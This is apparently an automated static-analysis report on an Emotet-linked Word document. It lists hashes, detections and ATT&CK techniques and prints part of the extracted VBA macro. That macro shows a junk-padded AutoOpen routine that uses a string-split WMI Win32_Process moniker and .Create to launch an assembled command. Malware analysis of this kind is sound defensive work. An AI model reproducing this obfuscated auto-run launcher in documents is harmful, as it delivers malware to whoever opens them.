Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 fd411887ec3579d7…

MALICIOUS

Office (OLE)

Size: 99.1 KB
Created: 2019-05-07 10:12:00
Authoring application: Microsoft Office Word
First seen: 2019-12-09
MD5: d3d05efd06a788667fbd125aeccba949
SHA-1: f2fcbe3af0f333d0e2617e8b3fbd193044902d65
SHA-256: fd411887ec3579d7a22f11a4d8a0984a451ce3f7ccd9f9bc0225ea2c12bd9f3c
Risk Score: 282

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Windows Management Instrumentation
T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6964647-0', strongly suggesting the Emotet family. Critical heuristics indicate the presence of VBA macros that utilize GetObject and CreateObject to launch a WMI process, specifically targeting Win32_Process. This indicates the macro is designed to execute arbitrary commands or download additional payloads. The autoopen macro is present, which is a common execution vector for malicious Office documents.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-6964647-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6964647-0
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher (critical) OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call (high) OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5093 bytes
SHA-256: c3bd8705570cfe60c9ef7b57347b3ac54b9f3dffd27e268ab3322f0b01349bcc

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "b1720618"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "w1578953"
Attribute VB_Base = "0{C1A5688F-8A34-49B0-8F55-EFF4989335E6}{FDAD0313-DC72-4D8D-8329-E9DB31704FB0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "E22014"

Attribute VB_Name = "D8773492"

Attribute VB_Name = "A580701"

Attribute VB_Name = "o_8234"

Attribute VB_Name = "A27379"
Attribute VB_Base = "0{F37157B9-92D7-41B0-BE30-F0B26FE70DA9}{B38EA070-32C4-4A7B-8DA2-156978FE509A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T_4460"
Function D14061(W7471584)
         While b844381_ And s0130958
'Y569_00E62_464c800410G802_90
      Wend
         While a05_90 And m9_446_1
'w59_966M01__83_J_60987Z6044669
      Wend
         While w3_85_ And j230273
'F4502230W4881749G615384Y59272_
      Wend
Set D14061 = CVar(W7471584)
         While n7700522 And H668505
'T57_8915X808160h067184A77_80
      Wend
         While B36304 And M608_92
'q0_54_o4056579X2099243i04190
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While f42799 And L7704099
'w254697c01847_k4823_08l424_2
      Wend
         While z0679462 And S458956
'h02504_p213892m4346364k50024
      Wend
         While K680621_ And U_7399
'Q39211L0620631H761671A5188101
      Wend
Call U2939849
         While V24_38 And l_53838
'V27225L92014_N04__279w485_0
      Wend
         While w29_804 And Z0320_2
'z43877Y1834991U4645895w82878
      Wend
         While l43461 And j874849
'B199761w3__27D2__8649f5179_75
      Wend
End Sub


Attribute VB_Name = "Y0498310"
Function U2939849()
On Error Resume Next
         While B31857 And Z36_1091
'P32532q598634a466103S71186
      Wend
         While R13623_1 And A371943
'l2___683K335660v7758237v98698
      Wend
         While I61794 And c42461
'V630213j492_92i_000740b4119_
      Wend
p206810 = w1578953.q64548 + A27379.A12063 + w1578953.q64548.ControlTipText + A27379.S0817563 + w1578953.q64548.PasswordChar + w1578953.q64548.PasswordChar + A27379.Z64636 + w1578953.q64548 + w1578953.q64548 + A27379.P5218__ + w1578953.q64548.ControlTipText + A27379.I0_71767 + w1578953.q64548.ControlTipText
         While l_0568 And R44923_
'a64_551j18718A049625F431446
      Wend
         While Z8631279 And t1259084
'B25_5323j__2521c20510d708298
      Wend
         While c_61158 And f906094
'r06871z776893u_72221K8_948
      Wend
Set G5633975 = D14061(GetObject("winmgmt" _
+ "s:Wi" + "n3" _
+ "2_Pr" _
+ "ocess"))
         While D326073 And L24085
'K143790Q6256_29C83_624j55_227
      Wend
         While M09705 And d801881_
'U__9248_h149_27Y23820X74_678
      Wend
G5633975.Create X85006 + p206810 + c51171, O924005_, T54591, j735779
         While X3_067_ And j9_5696
'b16603M59_7932j_09630O78902_4
      Wend
         While T61109_1 And d02334
'X99512_W56_2_Y830942b98324
      Wend
         While p65608 And j_36__78
'o0_0971d446_507r6461317z62707
      Wend
End Function


Attribute VB_Name = "T9365707"

Public Function T54591()
         While F76090 And w044579
'w43028D86__94S14822L6109_52
      Wend
         While I41891 And E880_46
'R342908J9159_49V7_2266j2__029
      Wend
         While B44_493 And V770134_
's06956_4Z58414__v480_19_h126886
      Wend
Set T54591 = D14061(GetObject("winmgmt" _
+ "s:Wi" + "n3" + "2_Pr" _
+ "ocess" + "S" + "tartup"))
         While X913926 And T11742
'M3078876F34_055Q08158r79_70
      Wend
         While G94793 And o9582444
'c565
... (truncated)